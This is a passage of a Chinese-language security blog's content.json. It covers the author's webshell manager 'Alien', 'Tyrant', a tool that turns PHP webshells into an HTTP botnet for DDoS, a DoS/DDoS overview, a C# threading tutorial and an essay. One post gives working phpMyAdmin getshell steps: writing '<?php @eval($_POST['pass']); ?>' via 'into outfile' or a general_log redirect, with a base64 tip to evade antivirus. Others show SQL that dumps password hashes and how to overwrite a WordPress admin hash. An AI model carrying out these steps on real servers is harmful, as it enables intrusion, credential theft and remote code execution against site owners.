-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcontent.json
1 lines (1 loc) · 56.8 KB
/
content.json
1
{"meta":{"title":"ISSAC's blog","subtitle":"CyberSecurity blog","description":"Look behind you...","author":"ISSAC","url":"http://example.com"},"pages":[{"title":"Alien","date":"2023-06-05T14:00:23.000Z","updated":"2023-06-12T03:51:35.568Z","comments":true,"path":"Alien/index.html","permalink":"http://example.com/Alien/index.html","excerpt":"","text":"Alien簡介Alien是一句話木馬管理工具,可以用在滲透測試和網站的管理。 聲明工具只限用於滲透測試和學習用途,請勿違法使用。 運行平台Windows需要安裝.NET Framework 使用說明 ID 主題 Url 1 System Information https://malbuffer4pt.github.io/Alien/systeminfo 2 File Manager https://malbuffer4pt.github.io/Alien/filemanager 3 Virtual Terminal https://malbuffer4pt.github.io/Alien/terminal 4 Database https://malbuffer4pt.github.io/Alien/database 5 Monitor https://malbuffer4pt.github.io/Alien/monitor 6 RegEdit https://malbuffer4pt.github.io/Alien/regedit"},{"title":"Alien FileManager","date":"2023-06-05T14:00:23.000Z","updated":"2023-06-12T17:53:11.881Z","comments":true,"path":"Alien/filemanager.html","permalink":"http://example.com/Alien/filemanager.html","excerpt":"","text":"介紹主要的File Manager介面參考了Hatchet的UI,有以下功能 : FileManager Basic(基本的讀寫增刪、上傳、下載、WGET) 看圖片(這是以往的工具沒有的功能, 如果伺服器內有身份證之類的圖片就可以證明漏洞的問題) ShortCut : 上方的ToolStrip FastDir : 會掃瞄指定的dir,如果有那就加到TreeView,只要點一下就可以快速打開 Other : 顯示其他資料 Search File掃描指定的檔案名,可自定掃瞄模式。 Priviledge掃播指定Directory和SubDirectory,列出讀寫權限 Logs把進行過的操作記下,可保存 看圖片功能某些情況下Folder內有上千張圖片,這種情況有可能是個人資料,可以使用該功能打開選中圖片,也可以一次打開當前dir下的所有Image檔。如果是前者那圖片會在不同分頁開啟,如果是後者那所有圖片都會在同一個分頁內雙撃分頁內任一張的圖片可以在新分頁打開。以分頁打開的圖片可以改SizeMode,有以下5種 : AutoSize : 自動調整大小 CenterImage : 把視角放在圖片的中心,不改變圖片大小 Normal : 顯示在左上角,但過大的圖片會被切掉 ScretchImage : 對圖片進行拉長或收縮至符合PictureBox的大小 Zoom : 對圖片進行拉長或收縮,但不改變圖片Width和Height的比例 由於可能會有很多圖片,所以可以設定Thread。 PS: 作者曾經沒有寫Thread功能,然後10張圖片直接卡死,而FastDir是把所有Directory都一次掃瞄,這是我目前測試後認為最好的做法,如果讀者有更好的方法歡迎提交issues。"},{"title":"Code","date":"2023-06-05T14:24:54.000Z","updated":"2023-06-12T07:55:45.171Z","comments":true,"path":"Code/index.html","permalink":"http://example.com/Code/index.html","excerpt":"","text":"介紹寫一些和程式有關的文章"},{"title":"Alien System Information","date":"2023-06-05T14:00:23.000Z","updated":"2023-06-12T03:40:32.518Z","comments":true,"path":"Alien/systeminfo.html","permalink":"http://example.com/Alien/systeminfo.html","excerpt":"","text":"介紹介面參考了大灰狼遠控,可以獲得伺服器的資訊,有以下7個 : ID 主題 功能 1 System 伺服器基本資訊和HTTP資訊 2 Process 伺服器目前所有運行程式 3 Service 伺服器所有服務 4 Connection 列出所有連接IP 5 Window 取得打開 WinForm的Title 6 User 取得伺服器所有使用者和使用者資訊 7 Port Scan 端口掃瞄 System Process Service Connection Window User Port Scan"},{"title":"Alien Database","date":"2023-06-05T14:00:23.000Z","updated":"2023-06-12T03:07:36.240Z","comments":true,"path":"Alien/database.html","permalink":"http://example.com/Alien/database.html","excerpt":"","text":"介紹Database的管理功能目前4.0只能讀不能寫,不過最近在寫最近的5.0打算加上寫的功能,還有一開始4.0寫得太趕了,BUG都沒有修好。 DB MySQL : php SQL Server : asp, aspx, asmx, ashx 功能Information Management SQL Shell PS : 圖片中的 Priviledge Exploit 那個還沒寫,4.0還沒有。"},{"title":"Alien Monitor","date":"2023-06-12T14:00:23.000Z","updated":"2023-06-12T03:16:29.844Z","comments":true,"path":"Alien/monitor.html","permalink":"http://example.com/Alien/monitor.html","excerpt":"","text":"介紹娛樂功能,實際在滲透測試中不見得會有用,只是證明了Webshell可以Screenshot的可行性。 Screenshot"},{"title":"Alien Virtual Terminal","date":"2023-06-05T14:00:23.000Z","updated":"2023-06-12T03:47:03.169Z","comments":true,"path":"Alien/terminal.html","permalink":"http://example.com/Alien/terminal.html","excerpt":"","text":"介紹虛擬终端,這個應該沒甚麼好介紹。 注意這是虛擬终端,不是真的终端,不能進入Interactive Shell,也就是說如果你打ssh那會直接卡死。之後考慮再寫一個能Interactive Shell的功能(目前有大概想法)。 Screenshot"},{"title":"Tools","date":"2023-06-05T14:00:39.000Z","updated":"2023-07-13T05:50:34.015Z","comments":true,"path":"Tools/index.html","permalink":"http://example.com/Tools/index.html","excerpt":"","text":"Table ID Name Download 1 工具大全 https://github.com/malbuffer4pt/IssacTools 2 Alien https://github.com/malbuffer4pt/Alien 3 SiteHunter https://github.com/malbuffer4pt/SiteHunter 4 C段掃瞄(已停止更新) https://github.com/malbuffer4pt/DomainClassCIPScan 5 MagicalPunch https://github.com/malbuffer4pt/Magical-Punch 6 DBer https://github.com/malbuffer4pt/DBer 7 Tyrant https://github.com/malbuffer4pt/Tyrant IssacTools ID Name Description 1 BlackHat_SEO 學習黑帽SEO時寫的程式 2 BufferOverflow 學BufferOverflow時在書上看到的程式 3 Learning 自學程式時寫的 4 SQL Shell 從Alien的Payloads拿出來再改寫一下的程式 5 SQL 奇奇怪怪的SQL 6 TCP_Handler 用Python寫的TCP Handler"},{"title":"BlackHat","date":"2023-06-06T09:14:25.000Z","updated":"2023-06-06T09:14:25.755Z","comments":true,"path":"BlackHat/index.html","permalink":"http://example.com/BlackHat/index.html","excerpt":"","text":""},{"title":"Alien RegEdit","date":"2023-06-12T02:00:23.000Z","updated":"2023-06-12T03:16:38.046Z","comments":true,"path":"Alien/regedit.html","permalink":"http://example.com/Alien/regedit.html","excerpt":"","text":"RegEdit跟Windows上的RegEdit差不多 Screenshot"},{"title":"【Tool】SiteHunter","date":"2023-06-05T17:33:28.000Z","updated":"2023-06-11T13:00:52.866Z","comments":true,"path":"Tools/【Tool】SiteHunter.html","permalink":"http://example.com/Tools/%E3%80%90Tool%E3%80%91SiteHunter.html","excerpt":"","text":""},{"title":"PenTest","date":"2023-06-12T07:50:56.000Z","updated":"2023-06-12T07:53:23.071Z","comments":true,"path":"PenTest/index.html","permalink":"http://example.com/PenTest/index.html","excerpt":"","text":"介紹用來寫一些滲透測試相關的文章,寫了就會貼在這。"},{"title":"Nonsense","date":"2023-06-11T17:12:23.000Z","updated":"2023-06-12T07:54:19.976Z","comments":true,"path":"Nonsense/index.html","permalink":"http://example.com/Nonsense/index.html","excerpt":"","text":"介紹用來寫廢文,可能跟技術沒有甚麼關係的文章。"},{"title":"categories","date":"2023-06-05T13:59:43.000Z","updated":"2023-06-05T14:31:06.800Z","comments":true,"path":"categories/index.html","permalink":"http://example.com/categories/index.html","excerpt":"","text":""},{"title":"【Tool】Alien","date":"2023-06-05T17:33:04.000Z","updated":"2023-06-16T16:51:45.236Z","comments":true,"path":"Tools/【Tool】Alien.html","permalink":"http://example.com/Tools/%E3%80%90Tool%E3%80%91Alien.html","excerpt":"","text":""},{"title":"tags","date":"2023-06-05T13:59:25.000Z","updated":"2023-06-05T14:45:50.980Z","comments":true,"path":"tags/index.html","permalink":"http://example.com/tags/index.html","excerpt":"","text":""}],"posts":[{"title":"【Tool】LazyUrl2TXT","slug":"【Tool】LazyUrl2TXT","date":"2023-07-13T05:48:11.000Z","updated":"2023-07-14T12:55:09.809Z","comments":true,"path":"2023/07/13/【Tool】LazyUrl2TXT/","link":"","permalink":"http://example.com/2023/07/13/%E3%80%90Tool%E3%80%91LazyUrl2TXT/","excerpt":"","text":"前言我自己會有一個壞習慣,那就是在網上看到一些有興趣的文章或者漫畫時會使用Ctrl+左鍵不停地在新分頁打開,然後回過神來時已經出現幾十多個分頁了,有時候又覺得Chrome的書籤管理員(Tab Manager)又很麻煩,又或者是不想記在別人看到的地方(如某些R18漫畫),所以就直接把Url寫在.txt檔案了。但是寫在.txt檔內又會有問題,那就是根本不知道這個Url內容到底是甚麼,如果把.txt檔內的Url一個一個地打開又會很麻時間,所以就寫了這個工具。 Screenshot & 測試建立一個.txt檔,內容如下: 1234567891011121314151617https://tw.manhuagui.com/comic/31550/https://tw.manhuagui.com/comic/31212/https://tw.manhuagui.com/comic/37980/https://tw.manhuagui.com/comic/23363/https://tw.manhuagui.com/comic/17165/https://tw.manhuagui.com/comic/32344/https://tw.manhuagui.com/comic/27586/https://tw.manhuagui.com/comic/48693/https://tw.manhuagui.com/comic/46337/https://tw.manhuagui.com/comic/15248/https://www.youtube.com/watch?v=h_D3VFfhvs4https://www.youtube.com/watch?v=AULG4MoYxQkhttps://www.youtube.com/watch?v=_Zvy2PidEMchttps://www.youtube.com/watch?v=ktvTqknDobUHello here is the testhttps://www.youtube.com/watch?v=3PG9OZrWgKM 使用LazyUrl2TXT打開 : 下載https://github.com/malbuffer4pt/IssacTools","categories":[],"tags":[{"name":"Miscellaneous","slug":"Miscellaneous","permalink":"http://example.com/tags/Miscellaneous/"},{"name":"Tools","slug":"Tools","permalink":"http://example.com/tags/Tools/"}],"keywords":[]},{"title":"【Tool】Tyrant DDoS","slug":"【Tool】TyrantDDoS","date":"2023-07-02T13:32:33.000Z","updated":"2023-07-13T05:38:54.726Z","comments":true,"path":"2023/07/02/【Tool】TyrantDDoS/","link":"","permalink":"http://example.com/2023/07/02/%E3%80%90Tool%E3%80%91TyrantDDoS/","excerpt":"","text":"簡介Tyrant DDoS是一個運用PHP一句話木馬進行壓力測試工具,透過把指定的Payload注入到eval函數來執行程式。 免責聲明工具只限用於學習、壓力測試等合法用途,如非法使用則後果自負 目的為甚麼我會寫這個工具呢? 我一開始是因為DDoS才會對資訊安全(OR網絡安全)感到興趣,在我剛接觸資訊安全領域時,身邊有很多人都會使用LOIC等工具進行惡作劇和攻撃,然後聲稱這是DDoS,後來我才明白這根本不是甚麼DDoS,只是簡單的DDoS而已,不知道是對DDoS的定義有甚麼誤會還是單純因為DDoS聽上去比較帥和比較強,大家都會說這是DDoS。我很不喜歡這樣,對這件事有點不爽,剛好我最近也看了幾篇DDoS技術原理的文章,再加上我編寫Alien時的經驗和一個想法———使用一句話木馬進行DDoS,所以就寫了這個工具,附合DDoS定義的DDoS,這聽上去很奇怪,但這是事實。這工具也是一個Proof of Concept,目前有很多DDoS工具都是用使TCP ReverseShell、P2P、IRC建立的,這個工具也有一個目的就是證明可以不使用這三種方法,而是使用HTTP就能建立BotNet。 Screenshot 下載https://github.com/malbuffer4pt/Tyrant","categories":[],"tags":[{"name":"BlackHat","slug":"BlackHat","permalink":"http://example.com/tags/BlackHat/"},{"name":"DDoS","slug":"DDoS","permalink":"http://example.com/tags/DDoS/"},{"name":"StressTest","slug":"StressTest","permalink":"http://example.com/tags/StressTest/"},{"name":"DoS","slug":"DoS","permalink":"http://example.com/tags/DoS/"},{"name":"PHP","slug":"PHP","permalink":"http://example.com/tags/PHP/"}],"keywords":[]},{"title":"【Code】C# 元件Invoke的方法","slug":"【Code】CSharpInvokeMethod","date":"2023-06-14T07:57:57.000Z","updated":"2023-06-17T02:26:08.795Z","comments":true,"path":"2023/06/14/【Code】CSharpInvokeMethod/","link":"","permalink":"http://example.com/2023/06/14/%E3%80%90Code%E3%80%91CSharpInvokeMethod/","excerpt":"","text":"前言記錄一下C#中可以在Thread中存取Controls的方法 C# 元件執行程式C# WindowsForm中我們可以把要執行的程式寫在元件的事件(Event)中,例如button1按下後可以彈出MessageBox的程式為 12345private void button1_Click(object sender, EventArgs e){ MessageBox.Show("Hello world"); //MessageBox.Show("Hello world","Here is the test", MessageBoxButtons.OK, MessageBoxIcon.Error);} 如果我們要把Hello world顯示在TextBox1上,那程式就會是 1234private void button1_Click(object sender, EventArgs e){ textBox1.Text = "Hello world";} 需要時間的程式現在考慮一個ConsoleApplication要把數字 i = 0 ~ 9999一行一行地顯示在Console上,這很簡單 : 1234for (int i = 0; i < 10000; i++){ Console.WriteLine(i);} 可是如果在WindowsForm中要把 i = 0 ~ 9999一行一行地顯示在textBox1上呢 ? 12345for (int i = 0 ; i < 10000; i++){ textBox1.AppendText(i.ToString()); textBox1.AppendText(Environment.NewLine);} 然後把這程式放到Button1內 : 12345678private void button1_Click(object sender, EventArgs e){ for (int i = 0 ; i < 10000; i++) { textBox1.AppendText(i.ToString()); textBox1.AppendText(Environment.NewLine); }} 好像很簡單對吧 ? 但事實不是這樣,當你執行後你會發現你的WindowsForm根本動不了,過了一段時間後WindowsForm可以動,然後數字 0 ~ 9999會突然出現在textBox1上,可是現在我想要的結果是數字會像在ConsoleApplication上一行一行地顯示在TextBox上,而不是這樣突然出現,何況程式還會突然卡死。 原因UI Thread (Main Thread)WindowsForm在不使用其他Thread的時候在程式打開(打開.exe檔)的一刻到程式關掉時,所有事都會發生在UI Thread上,例如for loop,Thread.Sleep(),Button按鍵等等,甚至包括WindowsForm本身的上下左右移動,也就是說當你按下button1時,程式就會進入for loop,而此時for loop就是發生在UI Thread上,直到for loop結束,UI Thread才會從for loop跑出來,可是在for loop結束之前,你的for loop都無法跑出來,也就不能對WindowsForm進行住何操作,而數字顯示在textBox1上這件事也是發生在UI Thread上,但此時UI Thread還在for loop當中,所以這就是為甚麼你的程式不能移動,也不會馬上顯示數字。 解決方法Thread這邊我們會想到可以建立一個新的Thread,用這個Thread去執行for loop,具體方法如下 : 12345678910111213void RunLoop(){ for (int i = 0 ; i < 10000; i++) { textBox1.AppendText(i.ToString()); textBox1.AppendText(Environment.NewLine); }}private void button1_Click(object sender, EventArgs e){ new Thread(RunLoop).Start();} 看上去合理的程式,執行看看,又出現問題了,IDE會直接跟你說跨執行緒作業無效。 原因新的Thread不能直接存取另外一個Thread,需要再加上一些東西,可以使用delegate或MethodInvoke的方法解決,這邊我提供一個我自己常用的方法,就是直接對元件Invoke 對元件直接Invoke12345678910111213141516171819void RunLoop(){ for (int i = 0 ; i < 10000; i++) { textBox1.Invoke(new Action(() => { textBox1.AppendText(i.ToString()); textBox1.AppendText(Environment.NewLine); })); //或者以下寫法 //textBox1.Invoke(new Action(() => textBox1.AppendText(i.ToString()))); //textBox1.Invoke(new Action(() => textBox1.AppendText(Environment.NewLine))); }}private void button1_Click(object sender, EventArgs e){ new Thread(RunLoop).Start();} 如此一來,數字就可以一行一行顯示 傳參數一個參數現在讓for loop的最大數字可控 : 1234567891011121314151617181920void RunLoop(object o){ for (int i = 0 ; i < (int)o; i++) { textBox1.Invoke(new Action(() => { textBox1.AppendText(i.ToString()); textBox1.AppendText(Environment.NewLine); })); //或者以下寫法 //textBox1.Invoke(new Action(() => textBox1.AppendText(i.ToString()))); //textBox1.Invoke(new Action(() => textBox1.AppendText(Environment.NewLine))); }}private void button1_Click(object sender, EventArgs e){ object o = 10; new Thread(RunLoop).Start();} 多個參數現在讓for loop的最大數字可控且在指定TextBox顯示 : 12345678910111213141516171819202122232425262728void RunLoop(object o){ object[] obj_array = (object[])o; int max = (int)obj_array[0]; TextBox textbox = (TextBox)obj_array[1]; //TextBox textbox = obj_array[1] as TextBox; for (int i = 0 ; i < (int)o; i++) { textbox.Invoke(new Action(() => { textbox.AppendText(i.ToString()); textbox.AppendText(Environment.NewLine); })); //或者以下寫法 //textbox.Invoke(new Action(() => textbox.AppendText(i.ToString()))); //textbox.Invoke(new Action(() => textbox.AppendText(Environment.NewLine))); }}private void button1_Click(object sender, EventArgs e){ int max = 100; new Thread(new ParameterizedThreadStart(RunLoop)).Start(new object[] { max, textBox1 });}","categories":[{"name":"Code","slug":"Code","permalink":"http://example.com/categories/Code/"}],"tags":[{"name":"Code","slug":"Code","permalink":"http://example.com/tags/Code/"},{"name":"C#","slug":"C","permalink":"http://example.com/tags/C/"},{"name":"Program","slug":"Program","permalink":"http://example.com/tags/Program/"}],"keywords":[{"name":"Code","slug":"Code","permalink":"http://example.com/categories/Code/"}]},{"title":"【Nonsense】資安圈 = 娛樂圈 ? 對資安圈現在的想法","slug":"【Nonsense】hack-entertain","date":"2023-06-12T08:06:38.000Z","updated":"2023-06-13T12:18:19.238Z","comments":true,"path":"2023/06/12/【Nonsense】hack-entertain/","link":"","permalink":"http://example.com/2023/06/12/%E3%80%90Nonsense%E3%80%91hack-entertain/","excerpt":"","text":"前言一直以來黑/駭客(本文用黑客一詞)給人的感覺都是很神秘和很帥,在很多電影中黑客給一種就是救埸王的感覺,小事就是入侵手機,大事就是入侵衛星。但真的是這樣嗎 ?我在資安這圈子時間也不算短了,打算分享一下我的想法。 技術的發展從古到今一直都有出現很多很令人興奮的新技術,這些技術不管是在文化還是科技上都把文明的時鐘推前了一大步,這些技術發展到今都有有些共同的特徵,會出現現狂熱朝,大家都在討論這種技術,當技術慢慢地成熟時,技術的細節已經不是大眾能理解的了,而是由幾個這方面領域的專家開拓的。那技術成熟之後呢 ? 當大家都可以接觸到這種技術的表面時,就會出現很奇怪的現像,大家都想分高下,看看誰能了解得更多,每當有人對這件事進行提問題,大家都會爭先恐後地發表自己所知道的。 對黑客的印象現實大眾對黑客的印象大眾對黑客的印象大概就是「天才」之類的。 動漫中的黑客全是美少女,帥哥 電影中的黑客全是帥哥美女, 現實中的黑帽黑客做不好就等死吧。 媒體的渲染媒體很喜歡把少年黑客叫做「天才」「最強」 資安VS畫畫在美術領域中從來不乏年輕而且畫畫很漂亮的人,在資安領域也是一樣,但是可以被同行稱為高手或大師的人又有多少個 ?我以前也有做過類似的事,可是後來我覺得這是很愚蠢的行為。 黑客甚麼都能黑?這是很大的誤會,以iphone為例子,雖然一直有一個說法是iphone有國家的後門存在,但要破解Iphone這種手機對大部分黑客(白帽+黑帽)都絕對不是甚麼容易的事,本文中第一部份說到入侵手機是一事「小事」,如果你指的入侵是任何一個人的手機只要有打開就能入侵的話,那這絕對不是甚麼小事。有很多人一聽到黑客這兩個事就會問他「你能幫我破解FB嗎 ?」大概在大眾的眼中破解一個帳號是一件很容易的事。漏洞找不到就是找不到,就像100%的HTML網頁,只有hello world的程式你要資安人士在這找出漏洞,他大概只會想打你。 找漏洞是很有趣的事 ?能找到漏洞然後寫出Exploit或者POC當然有趣,那要是找不到呢 ?相信有滲透相關經驗的人都體驗過那種坐在電腦前甚麼都找不到的感想,然後還是寫一個簡單的reflect xss在報告上。 實力上的比較比較的意義全心全意討論技術的人可以說是越來越少了,很多人學了資安相關的技術就要馬上告訴全世界自己是黑客,能得到身邊同年齡人的認可的確很重要,但絕對不是用這種方法。 領域的比較一直有人覺得黑客有所謂的最強,首先資訊安全是一個很大的領域,密碼破解、滲透測試、緩衝區溢位、物聯網安全、大規模監控、大規模掃瞄、數據修改、黑帽SEO等等…不同領域的實力強弱比較是沒有太大意義的,就好像要在跑步和跳高兩個領域進行比較並不合理一樣。如果要比較,那就應該是對社會XXX或者年薪等等有共通點的比較。 Bug Bounty計劃Bug Bounty的確是一個能看排名的計劃,2016年大陸的烏雲網還沒關閉時就有一個長期在榜一的大哥,叫做豬豬俠(曾發現阿里巴巴,百度等等存在高危漏洞),Bug Bounty的漏洞是會以分數進行計算的,如此一看那的確是可以在滲透方面分出高下。 工具編寫寫工具也是一個很多比較的方法,總會有人因為寫出很有名和很好用的工具而成名 黑客與英雄主義資安領域也有著英雄主義,會有黑客因為做出某件事而被大眾稱為英雄, 1OpenBSD crowd is a bunch of masturbating monkeys — Linus 這句話是Linux之父Linus罵OpenBSD的話,因為Linus認為軟體的bug比安全漏洞還要多,而資安人士因為找到漏洞成為英雄但忽略了一般bug的問題。","categories":[{"name":"Nonsense","slug":"Nonsense","permalink":"http://example.com/categories/Nonsense/"}],"tags":[{"name":"nonsense","slug":"nonsense","permalink":"http://example.com/tags/nonsense/"},{"name":"thinking","slug":"thinking","permalink":"http://example.com/tags/thinking/"},{"name":"hacker","slug":"hacker","permalink":"http://example.com/tags/hacker/"}],"keywords":[{"name":"Nonsense","slug":"Nonsense","permalink":"http://example.com/categories/Nonsense/"}]},{"title":"【BlackHat】DoS,DDoS與BotNet","slug":"【BlackHat】DoSandDDoS","date":"2023-06-12T08:05:35.000Z","updated":"2023-06-13T05:39:46.598Z","comments":true,"path":"2023/06/12/【BlackHat】DoSandDDoS/","link":"","permalink":"http://example.com/2023/06/12/%E3%80%90BlackHat%E3%80%91DoSandDDoS/","excerpt":"","text":"前言DoS/DDoS應該是小學生最喜歡的東西了,很多小學生和小屁孩都喜歡把說ddos然後就會覺得自己是黑客/駭客。(PS: 作者習慣使用黑客一詞,本文也會使用該詞)在2015-2016年左右時,台灣當時有很多人喜歡使用LOIC這種工具,然後就說自己是黑客。事實上他們那跟本就不是甚麼DDoS,只是DoS罷了,也許是說成DDoS聽上去會比較強吧。作者曾經也是那樣的人,所以我很討厭以前的自己(現在其實也差不多啦…)。DoS絕對不是甚麼好玩的東西,它的確是一種黑客會用的手段,但它也許是門檻最低的,然而正是因為門檻低,所以很多人都不願深入了解。DoS/DDoS需然看似很簡單,但是有很大的戰略價值,本文作者就打算記錄一下自己知道的,如果有一天我忘了也可以回來看,也算是給讀者們的科普。 思考為甚麼要攻撃 ?是誰在攻撃 ?相信這都是每個網頁admin都會想過的問題,說出這方面的技術不是想讓你們去攻撃其他人,而是想讓你們知道相關原理,再進行防範。 Disclaimer本文只限用於學習用途 DoSIntroductionDoS全稱是 Denial of Server,技術上指的是發一大堆封包或Request到目標電腦上,讓目標因為過大的負荷而停止服務。DDoS多了一個 D (Distributed)所以本文會把 DDoS/DoS的大部份技術都放在DoS上,而DDoS就會和BotNet一起討論 舊時代的DoSPing of Death以前的電腦無法處理大於IPv4最大的封包大小(65535 bytes)的ping封包,在目標接收到該封包後電腦會Crash掉 TearDrop發送損壞的封包,癱瘓系統。 以上兩種在現代基本已經過時,以下是目前主流的攻撃方式 現代常用的DoS技巧攻撃BandWidth ICMP/IGMP UDP Flood 反射+放大攻撃Introduction英文是DRDoS(Distributed Reflection Denial of Service),某些網路服務對於Request和Response之間長度大小的不一致,如果這時source IP可被偽造,那這個很大的Response就會直接發到受害者的電腦上,還可以隱藏攻撃者的IP。 Method ACK Reflect DNS Reflect NTP Reflect SNMP 系統資源消耗Method TCP Flood SYN Flood PSH + ACK RST Flood Sockstress 誤區DDoS/DoS不全是Flood,的確目前大部份都是Flood,但也有所謂的 Low and Slow Attack SSL攻撃IntroductionSSL : Secure Sockets Layer Method THC SSL DoS SSL Flood 攻撃應用資源Method DNS Query Flood DNS NXDomain Web攻撃Method HTTP Flood Slowloris POST ReDoS 漏洞型DoS找出網頁漏洞,該漏洞可把網頁直接卡死。 Minecraft中的DoS普通DoS如上 BOT發出特別的JSON封包到伺服器,該JSON封包在伺服器內構成虛擬玩家,達到伺服器最大人數時就會阻止其他正常玩定進入。同時虛擬玩家也可以進行無意義的洗版,進一步加重伺服器的負擔。 現代DoS常用的工具綜合工具 Hping PenTBox Zarp 壓力測試壓力測試(StressTest)即合法的用DoS攻撃網站 LOIC HOIC HULK Pro Slowloris RUDY THC SSL DOS DDoS & BotNetIntroductionDDoS就是比DoS多了一個D(Distributed) TheoryBotNet技術目前BotNet的主要技術有四個 IRC TCP Server & Client HTTP P2P 自願型BotNetBotNet可以用漏洞來「抓雞」,在受害者非自願的情況下進行攻撃,而自願型BotNet就是每個人都對目標發動DoS攻撃,很有名的Anonymous在過去就是這樣做的,每個成員都使用LOIC去攻撃。 DDoS的戰術價值1.2. 用DDoS吸引人的注意,等企業內部人力資源集中在處理DDoS時,很有可能會被其他攻撃者以入侵的方式攻撃伺服器。歷史上真有其事,具體可參考「 DDoS在黑色產業上的應用DDoS不止可以用來搞事情,還可以轉化為錢 : 競爭為了打撃對手而進行DDoS 勒索中小型公句和企業一般不具備防DDoS的技術,而專業的防DDoS又需要錢。攻撃者往往會把價錢定在一個「合適」的數字,讓受害者就範。 報復攻撃者們會利用個人要報復而去攻撃的情緒,提出DDoS的服務 DDoS的防範Introduction目前沒有一個完美的技術可以防DDoS,因為DDoS本來就是因為網路設計上的問題所導致的,但是有緩解和治理的方法。 BotNet的打撃對BotNet的處理在現實中是很困難的事,因為數量太多而且分散在不同地方。但目前也有幾種可行的方法 : 針對BotNet本身 Reverse Engineering : 取得樣本後把病毒特徵加到防毒軟體上,直接對成千上萬用戶檢查。 接管或者摧毀BotNet : 很難的做法,一般需要政府間的合作,只有實力強大的跨國公司才可以做到,歷史上成功的例子就是Microsoft對Nitol的摧毀。 直接封IP在以前中國GWF曾經因為技術上的問題而對國外做出疑似DDoS的行為,當時有幾個國家馬上封鎖中國的IP,當然了這招在現實中的中小企業不現實,除非攻撃者是使用DoS。 針對Fake IP可以參考 CERT和IETF的方法 CERT Advisory CA-1996-21 RFC 2827 Unicast Reverse Path Forwarding 流量的稀釋 CDN Anycast 誤區 防火牆可以防DDoS ?這是很大的誤會,強悍的DDoS反而會影響防火牆的運作效率。 買更好的BandWidth好的BandWidth要更多的錢,而DDoS流量是用GB計算了,沒有太大的用處。","categories":[],"tags":[{"name":"BlackHat","slug":"BlackHat","permalink":"http://example.com/tags/BlackHat/"},{"name":"ddos","slug":"ddos","permalink":"http://example.com/tags/ddos/"},{"name":"dos","slug":"dos","permalink":"http://example.com/tags/dos/"}],"keywords":[]},{"title":"【Tech】[PenTest] phpMyAdmin的getshell方法","slug":"【Tech】-PenTest-phpmyadmingetshell","date":"2023-06-12T08:03:06.000Z","updated":"2023-06-17T02:25:17.928Z","comments":true,"path":"2023/06/12/【Tech】-PenTest-phpmyadmingetshell/","link":"","permalink":"http://example.com/2023/06/12/%E3%80%90Tech%E3%80%91-PenTest-phpmyadmingetshell/","excerpt":"","text":"前言在滲透測試中有時可以運氣行好直接登入到phpMyAdmin,下一步我們可以透過getshell進行更深入的滲透,例如像域滲透這種。 環境 Windows 11 Apache + php8.2 phpMyAdmin 前提需要以下條件 phpMyAdmin最好是root帳號 知道Absolute Path (本文使用 D:/xampp/htdocs) 實戰Geshell方法phpMyAdmin getshell一般有兩種方法 : SQL getshell 後端 getshell 第一種是使用SQL把webshell寫到伺服器上,第二種是改後端密碼上傳webshell。 SQL getshell常用方法 - 使用 select into outfile這應該是最常用的方法了,在知道路徑的情況下可以用這招 12select load_file('D:/xampp/htdocs');select '<?php phpinfo();?>' into outfile 'D:/xampp/htdocs'; 這是最簡單的方法,也是很容易失敗的方法,大部份網頁admin都不是傻的,他們會有設定檔案權限,此時執行 1SHOW VARIABLES LIKE "secure_file_priv"; Value一般會有兩種結果 Folder路徑 : 代表只有該路徑才可以修改 NULL : 禁止修改 Log寫shellMySQL 5.0以上會自動寫Logs,把執行過的SQL指令都寫進一個.log檔,那如果此時的檔案不是.log而是.php呢? 執行以下指令 1SHOW VARIABLES LIKE 'general%'; 12set global general_log = "ON";set global general_log_file="D:/xampp/htdocs/shell.php"; 就會在D:/xampp/htdocs 生成一個shell.php然後再 1select '<?php @eval($_POST['pass']); ?>' 就可以getshell了 技巧最簡單的php一句話木馬 1<?php @eval($_POST['pass']); ?> 也是最容易被防毒查出來的,如果webshell的code寫得比較多可以把webshell base64加密,再使用php的 base64_decode(); 函數解密。 注意Log寫webshell的方法動作會很大的,會很容易被發現。另外記得要把一開始的.log檔案記下,不然你會無法還原。 後端GetShell後端登入 以wordpress為列子,phpMyAdmin+wordpress是比較容易getshell的,因為wordpress是基於php的,而後端一般都會有檔案修改和上傳等功能。Wordpress登入後端目前還算是很容易的,兩種做法 : 破解密碼Hash 在無法破解的情況下直接改密碼 WordPress加密後的密碼很上去很亂,但要改也不難,假設你的新密碼是admin,那就把admin以MD5加密,把MD5 Hash換進去就可以了。 GetShell方法一般三種方法 模版上傳 Plugin上傳 直接插入一句話木馬 這種用第三種會比較好,因為前兩種都比較容閉被發現。","categories":[],"tags":[{"name":"pentest","slug":"pentest","permalink":"http://example.com/tags/pentest/"},{"name":"php","slug":"php","permalink":"http://example.com/tags/php/"},{"name":"phpmyadmin","slug":"phpmyadmin","permalink":"http://example.com/tags/phpmyadmin/"},{"name":"getshell","slug":"getshell","permalink":"http://example.com/tags/getshell/"},{"name":"webshell","slug":"webshell","permalink":"http://example.com/tags/webshell/"}],"keywords":[]},{"title":"【Tech】[SQL]SQL注入取得使用者帳號密碼的方法","slug":"【Tech】-SQL-SQL注入取得使用者帳號密碼的方法","date":"2023-06-12T08:00:40.000Z","updated":"2023-06-12T13:14:36.433Z","comments":true,"path":"2023/06/12/【Tech】-SQL-SQL注入取得使用者帳號密碼的方法/","link":"","permalink":"http://example.com/2023/06/12/%E3%80%90Tech%E3%80%91-SQL-SQL%E6%B3%A8%E5%85%A5%E5%8F%96%E5%BE%97%E4%BD%BF%E7%94%A8%E8%80%85%E5%B8%B3%E8%99%9F%E5%AF%86%E7%A2%BC%E7%9A%84%E6%96%B9%E6%B3%95/","excerpt":"","text":"前言記錄幾個在sql注入中可以把database user, password拿出來的方法 SQLMap1sqlmap.py -u xxx --passwords SQL Query12345//MySQLselect host,user,password from mysql.user;//SQL Server 2022SELECT name, CONVERT(varchar(max), password_hash, 1) AS hashed_password FROM sys.sql_logins","categories":[],"tags":[],"keywords":[]},{"title":"【Tech】掛黑頁","slug":"【Tech】掛黑頁","date":"2023-06-05T17:39:12.000Z","updated":"2023-06-11T13:00:52.852Z","comments":true,"path":"2023/06/06/【Tech】掛黑頁/","link":"","permalink":"http://example.com/2023/06/06/%E3%80%90Tech%E3%80%91%E6%8E%9B%E9%BB%91%E9%A0%81/","excerpt":"","text":"介紹黑頁, 英文是 Deface Page, 指的是在入侵網站後直接把網站的 home page 改為自己的內容,一般都是用作惡意破壞或政治目的 : 